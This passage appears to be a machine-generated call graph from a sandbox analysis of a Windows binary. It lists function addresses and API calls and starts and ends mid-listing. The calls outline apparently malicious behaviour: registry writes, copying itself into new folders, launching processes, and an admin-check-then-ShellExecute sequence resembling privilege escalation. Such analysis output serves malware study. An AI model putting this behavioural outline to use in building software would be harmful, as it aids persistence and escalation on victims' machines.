20076->20100 20079 40dad2 20077->20079 20078->20076 20080 40db43 SetLastError 20079->20080 20081 40dce3 _unexpected 15 API calls 20079->20081 20082 40d3a8 __FrameHandler3::FrameUnwindToState 31 API calls 20080->20082 20083 40dae2 20081->20083 20085 40db4f 20082->20085 20086 40daea 20083->20086 20087 40daff 20083->20087 20084 40db37 SetLastError 20084->20052 20089 40e147 _unexpected 6 API calls 20086->20089 20088 40e147 _unexpected 6 API calls 20087->20088 20090 40db0b 20088->20090 20096 40daf6 20089->20096 20091 40db1e 20090->20091 20092 40db0f 20090->20092 20094 40d8c6 _unexpected 15 API calls 20091->20094 20093 40e147 _unexpected 6 API calls 20092->20093 20093->20096 20097 40db29 20094->20097 20095 40dd40 _free 15 API calls 20098 40dac3 20095->20098 20096->20095 20099 40dd40 _free 15 API calls 20097->20099 20098->20080 20099->20100 20100->20080 20100->20084 20100->20098 20101->20071 20105 410490 __FrameHandler3::FrameUnwindToState 20102->20105 20104 41050f __FrameHandler3::FrameUnwindToState 20104->19999 20105->20104 20107 40d3a8 __FrameHandler3::FrameUnwindToState 34 API calls 20105->20107 20108 40dd40 _free 15 API calls 20105->20108 20140 40faaa RtlEnterCriticalSection 20105->20140 20141 410506 20105->20141 20107->20105 20108->20105 20145 40b1c0 20109->20145 20112 410130 20114 410147 20112->20114 20115 410135 GetACP 20112->20115 20113 41011e GetOEMCP 20113->20114 20114->20002 20116 40dd7a 20114->20116 20115->20114 20117 40ddb8 20116->20117 20121 40dd88 _unexpected 20116->20121 20119 40aa25 __dosmaperr 15 API calls 20117->20119 20118 40dda3 RtlAllocateHeap 20120 40ddb6 20118->20120 20118->20121 20119->20120 20120->20005 20123 410572 20120->20123 20121->20117 20121->20118 20122 40d2b3 _unexpected 2 API calls 20121->20122 20122->20121 20124 4100fd 36 API calls 20123->20124 20125 410591 20124->20125 20126 4105e1 GetACP 20125->20126 20127 4105ef IsValidCodePage 20125->20127 20129 41059b CatchGuardHandler 20125->20129 20131 410614 __cftof 20125->20131 20126->20127 20126->20129 20128 410601 GetCPInfo 20127->20128 20127->20129 20128->20129 20128->20131 20129->20008 20187 4101d5 GetCPInfo 20131->20187 20133 410005 __FrameHandler3::FrameUnwindToState 20132->20133 20256 40faaa RtlEnterCriticalSection 20133->20256 20135 41000f 20257 41003c 20135->20257 20139 410028 __FrameHandler3::FrameUnwindToState 20139->20005 20140->20105 20144 40faf2 RtlLeaveCriticalSection 20141->20144 20143 41050d 20143->20105 20144->20143 20146 40b1dd 20145->20146 20147 40b1d3 20145->20147 20146->20147 20148 40da9c _unexpected 34 API calls 20146->20148 20147->20112 20147->20113 20149 40b1fe 20148->20149 20153 40ecab 20149->20153 20154 40b217 20153->20154 20155 40ecbe 20153->20155 20157 40ecd8 20154->20157 20155->20154 20161 4118b6 20155->20161 20158 40ed00 20157->20158 20159 40eceb 20157->20159 20158->20147 20159->20158 20182 41055f 20159->20182 20162 4118c2 __FrameHandler3::FrameUnwindToState 20161->20162 20163 40da9c _unexpected 34 API calls 20162->20163 20164 4118cb 20163->20164 20165 411919 __FrameHandler3::FrameUnwindToState 20164->20165 20173 40faaa RtlEnterCriticalSection 20164->20173 20165->20154 20167 4118e9 20174 41192d 20167->20174 20172 40d3a8 __FrameHandler3::FrameUnwindToState 34 API calls 20172->20165 20173->20167 20175 4118fd 20174->20175 20176 41193b _unexpected 20174->20176 20178 41191c 20175->20178 20176->20175 20177 411669 _unexpected 15 API calls 20176->20177 20177->20175 20181 40faf2 RtlLeaveCriticalSection 20178->20181 20180 411910 20180->20165 20180->20172 20181->20180 20183 40da9c _unexpected 34 API calls 20182->20183 20184 410569 20183->20184 20185 410484 __cftof 34 API calls 20184->20185 20186 41056f 20185->20186 20186->20158 20189 4102b9 CatchGuardHandler 20187->20189 20192 41020f 20187->20192 20189->20129 20190 410270 20207 41232f 20190->20207 20195 4114c8 20192->20195 20194 41232f 39 API calls 20194->20189 20196 40b1c0 __cftof 34 API calls 20195->20196 20197 4114e8 MultiByteToWideChar 20196->20197 20199 411521 20197->20199 20203 4115a5 CatchGuardHandler 20197->20203 20200 40dd7a 16 API calls 20199->20200 20204 411539 __cftof __alloca_probe_16 20199->20204 20200->20204 20201 41159f 20212 4115cc 20201->20212 20203->20190 20204->20201 20205 411575 MultiByteToWideChar 20204->20205 20205->20201 20206 41158f GetStringTypeW 20205->20206 20206->20201 20208 40b1c0 __cftof 34 API calls 20207->20208 20209 412342 20208->20209 20216 412149 20209->20216 20211 410291 20211->20194 20213 4115d8 20212->20213 20214 4115e9 20212->20214 20213->20214 20215 40dd40 _free 15 API calls 20213->20215 20214->20203 20215->20214 20218 412164 20216->20218 20217 41218a MultiByteToWideChar 20219 4121b6 20217->20219 20220 412307 CatchGuardHandler 20217->20220 20218->20217 20223 40dd7a 16 API calls 20219->20223 20227 4121cb __alloca_probe_16 20219->20227 20220->20211 20221 412203 MultiByteToWideChar 20222 41226e 20221->20222 20224 41221a 20221->20224 20226 4115cc __freea 15 API calls 20222->20226 20223->20227 20241 40e202 20224->20241 20226->20220 20227->20221 20227->20222 20228 412231 20228->20222 20229 412245 20228->20229 20230 41227d 20228->20230 20229->20222 20232 40e202 6 API calls 20229->20232 20231 40dd7a 16 API calls 20230->20231 20235 41228f __alloca_probe_16 20230->20235 20231->20235 20232->20222 20233 4122f8 20234 4115cc __freea 15 API calls 20233->20234 20234->20222 20235->20233 20236 40e202 6 API calls 20235->20236 20237 4122d7 20236->20237 20237->20233 20238 4122e6 WideCharToMultiByte 20237->20238 20238->20233 20239 412326 20238->20239 20240 4115cc __freea 15 API calls 20239->20240 20240->20222 20247 40de6f 20241->20247 20244 40e21e CatchGuardHandler 20244->20228 20246 40e25e LCMapStringW 20246->20244 20248 40df6b _unexpected 5 API calls 20247->20248 20249 40de85 20248->20249 20249->20244 20250 40e276 20249->20250 20253 40de89 20250->20253 20252 40e28c CatchGuardHandler 20252->20246 20254 40df6b _unexpected 5 API calls 20253->20254 20255 40de9f 20254->20255 20255->20252 20256->20135 20267 41076c 20257->20267 20259 41005e 20260 41076c 21 API calls 20259->20260 20261 41007d 20260->20261 20262 40dd40 _free 15 API calls 20261->20262 20263 41001c 20261->20263 20262->20263 20264 410030 20263->20264 20281 40faf2 RtlLeaveCriticalSection 20264->20281 20266 41003a 20266->20139 20268 41077d 20267->20268 20277 410779 __InternalCxxFrameHandler 20267->20277 20269 410784 20268->20269 20272 410797 __cftof 20268->20272 20270 40aa25 __dosmaperr 15 API calls 20269->20270 20271 410789 20270->20271 20273 40a968 __cftof 21 API calls 20271->20273 20274 4107c5 20272->20274 20275 4107ce 20272->20275 20272->20277 20273->20277 20276 40aa25 __dosmaperr 15 API calls 20274->20276 20275->20277 20279 40aa25 __dosmaperr 15 API calls 20275->20279 20278 4107ca 20276->20278 20277->20259 20280 40a968 __cftof 21 API calls 20278->20280 20279->20278 20280->20277 20281->20266 20283 40b1c0 __cftof 34 API calls 20282->20283 20284 410801 20283->20284 20284->19760 20288 4053a0 VirtualAlloc VirtualProtect 20285->20288 20287 406743 20289 405458 20288->20289 20290 405480 MessageBoxA 20289->20290 20291 40549a 20289->20291 20290->20289 20290->20290 20292 4054a0 MessageBoxA MessageBoxA 20291->20292 20292->20292 20293 4054db 20292->20293 20294 405500 Sleep 20293->20294 20294->20294 20548->19823 20549 4073a7 20560 4073ce InitializeCriticalSectionAndSpinCount GetModuleHandleW 20549->20560 20551 4073ac 20571 407808 20551->20571 20553 4073b3 20554 4073c6 20553->20554 20555 4073b8 20553->20555 20557 407dbf 4 API calls 20554->20557 20577 407995 20555->20577 20559 4073cd 20557->20559 20561 4073f1 GetModuleHandleW 20560->20561 20562 407402 GetProcAddress GetProcAddress 20560->20562 20561->20562 20565 407448 20561->20565 20563 407420 20562->20563 20564 407432 CreateEventW 20562->20564 20563->20564 20566 407424 20563->20566 20564->20565 20564->20566 20567 407dbf 4 API calls 20565->20567 20566->20551 20568 40744f RtlDeleteCriticalSection 20567->20568 20569 407464 CloseHandle 20568->20569 20570 40746b 20568->20570 20569->20570 20570->20551 20572 407814 20571->20572 20573 407818 20571->20573 20572->20553 20574 407dbf 4 API calls 20573->20574 20576 407825 ___scrt_release_startup_lock 20573->20576 20575 40788e 20574->20575 20576->20553 20580 407968 20577->20580 20581 407977 20580->20581 20582 40797e 20580->20582 20586 40cd9f 20581->20586 20589 40ce21 20582->20589 20585 4073c2 20587 40ce21 24 API calls 20586->20587 20588 40cdb1 20587->20588 20588->20585 20592 40cae9 20589->20592 20591 40ce52 20591->20585 20593 40caf5 __FrameHandler3::FrameUnwindToState 20592->20593 20600 40faaa RtlEnterCriticalSection 20593->20600 20595 40cb03 20601 40cb3a 20595->20601 20597 40cb10 20611 40cb2e 20597->20611 20599 40cb21 __FrameHandler3::FrameUnwindToState 20599->20591 20600->20595 20602 40cb50 _unexpected 20601->20602 20603 40cb58 20601->20603 20602->20597 20603->20602 20610 40cbb1 20603->20610 20614 40aa6b 20603->20614 20605 40aa6b 24 API calls 20606 40cbc7 20605->20606 20608 40dd40 _free 15 API calls 20606->20608 20607 40cba7 20609 40dd40 _free 15 API calls 20607->20609 20608->20602 20609->20610 20610->20602 20610->20605 20643 40faf2 RtlLeaveCriticalSection 20611->20643 20613 40cb38 20613->20599 20615 40aa76 20614->20615 20616 40aa9e 20615->20616 20617 40aa8f 20615->20617 20618 40aaad 20616->20618 20623 40ddc8 20616->20623 20619 40aa25 __dosmaperr 15 API calls 20617->20619 20631 40de06 20618->20631 20622 40aa94 __cftof 20619->20622 20622->20607 20624 40ddd3 20623->20624 20625 40ddf3 RtlSizeHeap 20624->20625 20626 40ddde 20624->20626 20625->20618 20627 40aa25 __dosmaperr 15 API calls 20626->20627 20628 40dde3 20627->20628 20629 40a968 __cftof 21 API calls 20628->20629 20630 40ddee 20629->20630 20630->20618 20632 40de13 20631->20632 20633 40de1e 20631->20633 20635 40dd7a 16 API calls 20632->20635 20634 40de26 20633->20634 20641 40de2f _unexpected 20633->20641 20636 40dd40 _free 15 API calls 20634->20636 20639 40de1b 20635->20639 20636->20639 20637 40de34 20640 40aa25 __dosmaperr 15 API calls 20637->20640 20638 40de59 RtlReAllocateHeap 20638->20639 20638->20641 20639->20622 20640->20639 20641->20637 20641->20638 20642 40d2b3 _unexpected 2 API calls 20641->20642 20642->20641 20643->20613 20644 2d1d2e9 DeleteCriticalSection 20645 2d1d304 20644->20645 20646 2d1d2fd CloseHandle 20644->20646 20647 2d1d314 20645->20647 20648 2d1d30d CloseHandle 20645->20648 20646->20645 20651 2d15558 WSACleanup 20647->20651 20648->20647 20658 2d20283 ReleaseMutex FindCloseChangeNotification 20651->20658 20653 2d1556c 20659 2d13036 20653->20659 20656 2d13036 2 API calls 20657 2d1557c 20656->20657 20658->20653 20660 2d13044 20659->20660 20661 2d1303f 20659->20661 20660->20656 20663 2d15eee GetProcessHeap RtlFreeHeap 20661->20663 20663->20660 20664 2d23058 20665 2d23073 20664->20665 20666 2d23061 CreateThread 20664->20666 20666->20665 20667 2d15ce2 GetCommandLineA 20666->20667 20668 2d15cf7 GetStartupInfoA 20667->20668 20676 2d15d70 20668->20676 20671 2d15d43 20672 2d15d52 GetModuleHandleA 20671->20672 20679 2d23457 20672->20679 20674 2d15d61 20675 2d15d68 ExitProcess 20674->20675 20735 2d15c8e GetProcessHeap HeapAlloc 20676->20735 20678 2d15d7f 20678->20671 20680 2d2347d 20679->20680 20681 2d23489 GetTickCount 20680->20681 20736 2d110ad 20681->20736 20683 2d23495 GetModuleFileNameA 20737 2d21e21 20683->20737 20685 2d236cf 21032 2d210d7 20685->21032 20687 2d236db 20689 2d15c16 VirtualFree GetProcessHeap RtlFreeHeap 20687->20689 20688 2d234bf 20688->20685 20744 2d11085 GetProcessHeap RtlAllocateHeap 20688->20744 20691 2d236e4 20689->20691 20691->20674 20692 2d234e9 20693 2d23505 CreateEventA GetLastError 20692->20693 20693->20685 20694 2d23528 20693->20694 20694->20685 20695 2d23534 RegCreateKeyExA RegSetValueExA RegSetValueExA RegCloseKey 20694->20695 20745 2d15a10 Sleep 20695->20745 20701 2d235c4 20702 2d235d7 SHGetFolderPathW lstrcatW CreateDirectoryW 20701->20702 20703 2d23635 20702->20703 20704 2d23615 20702->20704 20705 2d2364a 20703->20705 20707 2d1fbfc 4 API calls 20703->20707 20872 2d1fbfc GetCurrentProcess OpenProcessToken 20704->20872 20708 2d236ac 20705->20708 20885 2d21136 20705->20885 20715 2d23640 20707->20715 20710 2d236b7 20708->20710 21085 2d21f13 GetCurrentProcess IsWow64Process 20708->21085 21096 2d14e5b 20710->21096 20712 2d2361f 21050 2d1f51d LoadLibraryA 20712->21050 20715->20705 20877 2d22fd7 20715->20877 20718 2d23671 21021 2d1362d 20718->21021 20721 2d236aa 21105 2d14bc0 20721->21105 20724 2d23630 21071 2d21a3c 20724->21071 20725 2d23629 21053 2d21ab9 20725->21053 20733 2d236a3 21084 2d15ea5 VirtualFree 20733->21084 20735->20678 20736->20683 21117 2d11085 GetProcessHeap RtlAllocateHeap 20737->21117 20739 2d21e36 CreateFileA 20740 2d21e5b 20739->20740 20741 2d21e5e GetFileSize ReadFile 20739->20741 20740->20741 20742 2d21e7e FindCloseChangeNotification 20741->20742 20743 2d21e7c 20741->20743 20742->20688 20743->20742 20744->20692 21118 2d2044f 20745->21118 20747 2d15a34 21123 2d20346 20747->21123 20755 2d15a67 21153 2d1304c 20755->21153 20757 2d15a73 21156 2d12e93 20757->21156 20759 2d15a7f 20760 2d13036 2 API calls 20759->20760 20761 2d15a87 20760->20761 21160 2d1595e 20761->21160 20769 2d15ab5 20770 2d21dc0 11 API calls 20769->20770 20771 2d15ad4 20770->20771 20772 2d13437 3 API calls 20771->20772 20773 2d15ae1 20772->20773 21191 2d15ea5 VirtualFree 20773->21191 20775 2d15ae9 20776 2d21dc0 11 API calls 20775->20776 20777 2d15b08 20776->20777 20778 2d13437 3 API calls 20777->20778 20779 2d15b15 20778->20779 21192 2d15ea5 VirtualFree 20779->21192 20781 2d15b1d 20782 2d21dc0 11 API calls 20781->20782 20783 2d15b3c 20782->20783 20784 2d13437 3 API calls 20783->20784 20785 2d15b49 20784->20785 21193 2d15ea5 VirtualFree 20785->21193 20787 2d15b51 20788 2d21dc0 11 API calls 20787->20788 20789 2d15b97 20788->20789 20790 2d13437 3 API calls 20789->20790 20791 2d15ba4 20790->20791 21194 2d15ea5 VirtualFree 20791->21194 20793 2d15bb4 20794 2d13036 2 API calls 20793->20794 20795 2d15bbc 20794->20795 20796 2d13036 2 API calls 20795->20796 20797 2d15bc4 20796->20797 20798 2d15bd1 20797->20798 21202 2d11e71 20797->21202 20800 2d13036 2 API calls 20798->20800 20801 2d15be4 20800->20801 21195 2d1feed 20801->21195 20804 2d214a6 21307 2d123ca 20804->21307 20807 2d1fbfc 4 API calls 20808 2d214c2 20807->20808 20809 2d135e5 4 API calls 20808->20809 20810 2d214ee 20809->20810 20811 2d13437 3 API calls 20810->20811 20812 2d214f6 20811->20812 21322 2d15ea5 VirtualFree 20812->21322 20814 2d214fe 20815 2d1362d 3 API calls 20814->20815 20816 2d2150a 20815->20816 21323 2d13335 20816->21323 20818 2d21515 21330 2d15ea5 VirtualFree 20818->21330 20820 2d2151d 20821 2d135e5 4 API calls 20820->20821 20822 2d2152a 20821->20822 20823 2d13437 3 API calls 20822->20823 20824 2d21533 20823->20824 21331 2d15ea5 VirtualFree 20824->21331 20826 2d2153b 20827 2d135e5 4 API calls 20826->20827 20828 2d21548 20827->20828 20829 2d13437 3 API calls 20828->20829 20830 2d21551 20829->20830 21332 2d15ea5 VirtualFree 20830->21332 20832 2d21559 20833 2d135e5 4 API calls 20832->20833 20834 2d21566 20833->20834 20835 2d13437 3 API calls 20834->20835 20836 2d2156f 20835->20836 21333 2d15ea5 VirtualFree 20836->21333 20838 2d21577 21334 2d2106c 20838->21334 20841 2d21631 20865 2d14ee7 20841->20865 20842 2d21629 20845 2d13036 2 API calls 20842->20845 20845->20841 20847 2d215ff 20847->20842 21360 2d1f481 20847->21360 20849 2d1304c 2 API calls 20851 2d215c7 20849->20851 20850 2d13437 3 API calls 20852 2d21621 20850->20852 20853 2d15911 8 API calls 20851->20853 21371 2d15ea5 VirtualFree 20852->21371 20855 2d215d1 20853->20855 20856 2d160aa 4 API calls 20855->20856 20857 2d215d9 20856->20857 21352 2d12ecf 20857->21352 20860 2d13437 3 API calls 20861 2d215ec 20860->20861 21359 2d15ea5 VirtualFree 20861->21359 20863 2d215f4 20864 2d13036 2 API calls 20863->20864 20864->20847 21403 2d158d3 20865->21403 20867 2d14efb 21408 2d11dc8 20867->21408 20873 2d1fc3f 20872->20873 20874 2d1fc1f GetTokenInformation 20872->20874 20875 2d1fc45 FindCloseChangeNotification 20873->20875 20876 2d1fc4e 20873->20876 20874->20873 20875->20876 20876->20703 20876->20712 21427 2d11085 GetProcessHeap RtlAllocateHeap 20877->21427 20879 2d22fe5 21428 2d11085 GetProcessHeap RtlAllocateHeap 20879->21428 20881 2d22fed 20882 2d23001 GetModuleFileNameA 20881->20882 20883 2d23019 20882->20883 20884 2d23048 WinExec 20883->20884 20884->20705 20886 2d1f481 12 API calls 20885->20886 20887 2d2114c 20886->20887 21429 2d134a7 20887->21429 20892 2d20fae RegCloseKey 20893 2d2116e 20892->20893 20983 2d21234 20893->20983 21438 2d1f76b 20893->21438 20894 2d21250 20898 2d21259 SHGetKnownFolderPath 20894->20898 20903 2d213d3 20894->20903 20896 2d2106c 5 API calls 20896->20894 20901 2d135e5 4 API calls 20898->20901 20899 2d21450 20905 2d135e5 4 API calls 20899->20905 20900 2d13437 3 API calls 20906 2d21197 20900->20906 20902 2d21275 20901->20902 20908 2d1346a 9 API calls 20902->20908 20903->20899 20904 2d213ee 20903->20904 20909 2d13437 3 API calls 20903->20909 20910 2d2106c 5 API calls 20904->20910 20911 2d2145b 20905->20911 21443 2d15ea5 VirtualFree 20906->21443 20913 2d21282 20908->20913 20909->20904 20914 2d21403 20910->20914 20915 2d135e5 4 API calls 20911->20915 20912 2d2119f 21444 2d1f71f SHCreateDirectoryExW 20912->21444 20917 2d135e5 4 API calls 20913->20917 20918 2d2148d 20914->20918 20922 2d1362d 3 API calls 20914->20922 20919 2d21468 20915->20919 20921 2d2128f 20917->20921 21485 2d15ea5 VirtualFree 20918->21485 20923 2d13335 5 API calls 20919->20923 20920 2d211a6 20926 2d1362d 3 API calls 20920->20926 20927 2d1346a 9 API calls 20921->20927 20928 2d21417 20922->20928 20929 2d21471 20923->20929 20925 2d21495 21486 2d15ea5 VirtualFree 20925->21486 20931 2d211b2 20926->20931 20932 2d212a4 20927->20932 21494 2d12fda 20928->21494 21500 2d15ea5 VirtualFree 20929->21500 21445 2d1346a 20931->21445 20937 2d1346a 9 API calls 20932->20937 20935 2d2149d 20935->20708 20935->20718 20941 2d212ab 20937->20941 20939 2d21479 DeleteFileW 21018 2d213a6 20939->21018 20944 2d1346a 9 API calls 20941->20944 20942 2d21039 RegSetValueExW 20945 2d21432 20942->20945 20943 2d13335 5 API calls 20947 2d211c9 20943->20947 20948 2d212b2 20944->20948 21499 2d15ea5 VirtualFree 20945->21499 21452 2d15ea5 VirtualFree 20947->21452 21461 2d13554 20948->21461 20952 2d2143c 20955 2d13036 2 API calls 20952->20955 20953 2d211d1 CopyFileW 20953->20918 20957 2d211e5 20953->20957 20956 2d21444 20955->20956 20956->20918 20959 2d21448 20956->20959 21453 2d13221 20957->21453 20958 2d13554 11 API calls 20961 2d212cc 20958->20961 20962 2d20fae RegCloseKey 20959->20962 20964 2d13261 lstrlenW 20961->20964 20962->20899 20965 2d212d6 20964->20965 21478 2d21d35 CreateFileA 20965->21478 20966 2d15911 8 API calls 20967 2d211fa 20966->20967 20969 2d160aa 4 API calls 20967->20969 20971 2d21202 20969->20971 20973 2d2106c 5 API calls 20971->20973 20975 2d2121b 20973->20975 20974 2d212e8 21482 2d15ea5 VirtualFree 20974->21482 21458 2d21039 20975->21458 20978 2d212f0 20980 2d1f76b 5 API calls 20978->20980 20982 2d212fb 20980->20982 20981 2d13036 2 API calls 20981->20983 20984 2d1346a 9 API calls 20982->20984 20983->20894 20983->20896 20985 2d2130a 20984->20985 20986 2d135e5 4 API calls 20985->20986 20987 2d21317 20986->20987 20988 2d1346a 9 API calls 20987->20988 20989 2d21328 20988->20989 20990 2d1346a 9 API calls 20989->20990 20991 2d2132f 20990->20991 20992 2d1346a 9 API calls 20991->20992 20993 2d2133c 20992->20993 20994 2d13554 11 API calls 20993->20994 20995 2d21348 20994->20995 20996 2d13554 11 API calls 20995->20996 20997 2d21356 20996->20997 20998 2d13261 lstrlenW 20997->20998 20999 2d21360 20998->20999 21000 2d21d35 3 API calls 20999->21000 21001 2d2136a 21000->21001 21483 2d15ea5 VirtualFree 21001->21483 21003 2d21373 21484 2d15ea5 VirtualFree 21003->21484 21005 2d2137b CopyFileW 21006 2d213b1 21005->21006 21007 2d2138f 21005->21007 21490 2d15ea5 VirtualFree 21006->21490 21487 2d15ea5 VirtualFree 21007->21487 21010 2d21394 21488 2d15ea5 VirtualFree 21010->21488 21011 2d213b6 21491 2d15ea5 VirtualFree 21011->21491 21014 2d2139e 21489 2d15ea5 VirtualFree 21014->21489 21015 2d213c0 21492 2d15ea5 VirtualFree 21015->21492 21501 2d15ea5 VirtualFree 21018->21501 21019 2d213c8 21493 2d15ea5 VirtualFree 21019->21493 21022 2d1365d 21021->21022 21023 2d1363f 21021->21023 21028 2d20bd9 21022->21028 21024 2d13261 lstrlenW 21023->21024 21025 2d13646 21024->21025 21557 2d15eb4 VirtualAlloc 21025->21557 21027 2d13652 lstrcpyW 21027->21022 21029 2d11052 21028->21029 21030 2d20bf1 CreateProcessW 21029->21030 21031 2d20c1e 21030->21031 21083 2d15ea5 VirtualFree 21031->21083 21033 2d210e1 21032->21033 21034 2d210e6 21032->21034 21035 2d20fae RegCloseKey 21033->21035 21558 2d15c16 21034->21558 21035->21034 21051 2d1f54f 21050->21051 21052 2d1f53f GetProcAddress 21050->21052 21051->20724 21051->20725 21052->21051 21054 2d1fbfc 4 API calls 21053->21054 21055 2d21ac9 21054->21055 21056 2d21bf2 21055->21056 21057 2d21ad2 CloseHandle GetCurrentProcess IsWow64Process 21055->21057 21056->20703 21058 2d21b01 21057->21058 21059 2d21af9 21057->21059 21581 2d218ba InitializeSecurityDescriptor 21058->21581 21576 2d1f7e0 21059->21576 21062 2d21b06 21063 2d21b19 GetModuleFileNameA 21062->21063 21587 2d21855 lstrlenA RegOpenKeyExA 21063->21587 21066 2d21855 5 API calls 21067 2d21b48 GetSystemDirectoryW lstrcatW ShellExecuteW ShellExecuteExW TerminateProcess 21066->21067 21068 2d21bd0 Sleep RegDeleteKeyA ExitProcess 21067->21068 21069 2d21bc8 21067->21069 21592 2d1f7b9 21069->21592 21072 2d11052 21071->21072 21073 2d21a51 GetModuleFileNameW IsUserAnAdmin 21072->21073 21074 2d21ab4 21073->21074 21075 2d21a68 21073->21075 21074->20703 21076 2d1fbfc 4 API calls 21075->21076 21077 2d21a6d 21076->21077 21077->21074 21603 2d219c9 RegOpenKeyExW 21077->21603 21079 2d21a78 21080 2d21a7d FindResourceW LoadResource SizeofResource LockResource 21079->21080 21080->21074 21081 2d21aad 21080->21081 21606 2d21936 21081->21606 21083->20733 21084->20721 21086 2d21fd3 21085->21086 21087 2d21f3a 21085->21087 21086->20710 21088 2d21fc3 21087->21088 21089 2d21f43 VirtualAlloc GetWindowsDirectoryA lstrlenA 21087->21089 21612 2d220b8 CreateToolhelp32Snapshot 21088->21612 21090 2d21f7a 21089->21090 21093 2d21f89 CreateProcessA 21090->21093 21092 2d21fc8 21092->21086 21619 2d21fd8 OpenProcess GetCurrentProcessId 21092->21619 21093->21086 21094 2d21fb3 Sleep 21093->21094 21094->21092 21098 2d14e76 21096->21098 21097 2d15c6d lstrlenW lstrcpyW VirtualAlloc 21097->21098 21098->21097 21099 2d13554 11 API calls 21098->21099 21101 2d15ea5 VirtualFree 21098->21101 21102 2d14ec7 Sleep 21098->21102 21627 2d157fb 21098->21627 21638 2d1562f 21098->21638 21099->21098 21101->21098 21102->21098 21104 2d14ee2 21102->21104 21104->20721 21837 2d15ea5 VirtualFree 21105->21837 21107 2d14bd4 21108 2d15c16 3 API calls 21107->21108 21109 2d14bdf WSACleanup 21108->21109 21836 2d20283 ReleaseMutex FindCloseChangeNotification 21109->21836 21112 2d1556c 21113 2d13036 2 API calls 21112->21113 21114 2d15574 21113->21114 21115 2d13036 2 API calls 21114->21115 21116 2d1557c 21115->21116 21117->20739 21206 2d1fece 21118->21206 21122 2d20477 21122->20747 21124 2d20362 21123->21124 21125 2d15a42 21123->21125 21124->21125 21126 2d20381 21124->21126 21127 2d203df 21124->21127 21136 2d133bf lstrlenA 21125->21136 21211 2d12f91 21126->21211 21127->21125 21129 2d12f91 6 API calls 21127->21129 21130 2d203fd 21129->21130 21130->21125 21132 2d20ac3 6 API calls 21130->21132 21135 2d12296 6 API calls 21130->21135 21132->21130 21134 2d20397 21134->21125 21214 2d20ac3 21134->21214 21218 2d12296 21134->21218 21135->21130 21137 2d133d2 lstrlenA 21136->21137 21138 2d133ee 21136->21138 21240 2d15e22 VirtualAlloc 21137->21240 21141 2d202b9 21138->21141 21140 2d133e2 lstrcpyA 21140->21138 21145 2d202cb 21141->21145 21150 2d15a5f 21141->21150 21144 2d133bf 4 API calls 21144->21145 21145->21144 21148 2d13036 2 API calls 21145->21148 21149 2d20330 21145->21149 21145->21150 21242 2d15ca3 LoadLibraryA GetProcAddress 21145->21242 21247 2d20af9 21145->21247 21250 2d133a3 lstrcmpA 21145->21250 21251 2d15ea5 VirtualFree 21145->21251 21148->21145 21252 2d1239e 21149->21252 21152 2d15ea5 VirtualFree 21150->21152 21152->20755 21257 2d15eff GetProcessHeap RtlAllocateHeap 21153->21257 21155 2d1305e 21155->20757 21157 2d12eab 21156->21157 21159 2d12eb0 21156->21159 21258 2d15eff GetProcessHeap RtlAllocateHeap 21157->21258 21159->20759 21259 2d12e4c 21160->21259 21163 2d1304c 2 API calls 21164 2d15991 21163->21164 21266 2d15911 21164->21266 21169 2d13036 2 API calls 21170 2d159ae 21169->21170 21171 2d21dc0 21170->21171 21172 2d21dd4 21171->21172 21182 2d15aa3 21171->21182 21289 2d11085 GetProcessHeap RtlAllocateHeap 21172->21289 21174 2d21ddf 21290 2d135e5 lstrlenW 21174->21290 21176 2d21e02 21177 2d13437 3 API calls 21176->21177 21178 2d21e0a 21177->21178 21295 2d15ea5 VirtualFree 21178->21295 21180 2d21e12 21296 2d11099 GetProcessHeap HeapFree 21180->21296 21183 2d13437 21182->21183 21184 2d13462 21183->21184 21185 2d13449 21183->21185 21190 2d15ea5 VirtualFree 21184->21190 21299 2d13384 21185->21299 21187 2d13450 21188 2d15e22 VirtualAlloc 21187->21188 21189 2d13457 lstrcpyW 21188->21189 21189->21184 21190->20769 21191->20775 21192->20781 21193->20787 21194->20793 21302 2d20125 21195->21302 21199 2d1fefd 21306 2d15ea5 VirtualFree 21199->21306 21201 2d15bec 21201->20804 21203 2d11e94 21202->21203 21205 2d11e83 21202->21205 21203->20798 21204 2d13036 2 API calls 21204->21205 21205->21203 21205->21204 21210 2d20298 CreateMutexA 21206->21210 21208 2d1fede 21209 2d15f53 GetProcessHeap HeapAlloc 21208->21209 21209->21122 21210->21208 21230 2d15ec5 21211->21230 21213 2d12fa7 21213->21134 21215 2d20adc 21214->21215 21216 2d12f91 6 API calls 21215->21216 21217 2d20af1 21216->21217 21217->21134 21219 2d122b0 21218->21219 21220 2d12364 21218->21220 21239 2d15f53 GetProcessHeap HeapAlloc 21219->21239 21222 2d12e93 2 API calls 21220->21222 21223 2d1238c 21222->21223 21224 2d13036 2 API calls 21223->21224 21226 2d12397 21224->21226 21225 2d122d9 21225->21225 21228 2d12e93 2 API calls 21225->21228 21229 2d12355 21225->21229 21226->21134 21227 2d11e71 2 API calls 21227->21220 21228->21225 21229->21220 21229->21227 21231 2d15ed0 21230->21231 21232 2d15ec9 GetProcessHeap RtlAllocateHeap 21230->21232 21234 2d15ed4 21231->21234 21235 2d15edc GetProcessHeap HeapReAlloc 21231->21235 21232->21213 21238 2d15eee GetProcessHeap RtlFreeHeap 21234->21238 21235->21213 21237 2d15ed9 21237->21213 21238->21237 21239->21225 21241 2d15e40 21240->21241 21241->21140 21243 2d15ce1 21242->21243 21244 2d15cc2 21242->21244 21243->21145 21245 2d15cc6 21244->21245 21246 2d15cd9 ExitProcess 21244->21246 21245->21246 21248 2d12e93 2 API calls 21247->21248 21249 2d20b21 21248->21249 21249->21145 21250->21145 21251->21145 21253 2d15ca3 3 API calls 21252->21253 21254 2d123b3 21253->21254 21255 2d20af9 2 API calls 21254->21255 21256 2d123c1 21255->21256 21256->21150 21257->21155 21258->21159 21287 2d15eff GetProcessHeap RtlAllocateHeap 21259->21287 21261 2d12e5b 21262 2d12f91 6 API calls 21261->21262 21263 2d12e84 21262->21263 21288 2d15eee GetProcessHeap RtlFreeHeap 21263->21288 21265 2d12e8b 21265->21163 21267 2d15923 21266->21267 21275 2d15945 21266->21275 21268 2d12e4c 8 API calls 21267->21268 21270 2d15935 21268->21270 21269 2d1304c 2 API calls 21271 2d15955 21269->21271 21272 2d12e93 2 API calls 21270->21272 21276 2d160aa 21271->21276 21273 2d1593d 21272->21273 21274 2d13036 2 API calls 21273->21274 21274->21275 21275->21269 21277 2d1304c 2 API calls 21276->21277 21278 2d160c2 21277->21278 21279 2d1304c 2 API calls 21278->21279 21280 2d16102 21279->21280 21281 2d13036 2 API calls 21280->21281 21282 2d1610a 21281->21282 21283 2d13036 2 API calls 21282->21283 21284 2d16112 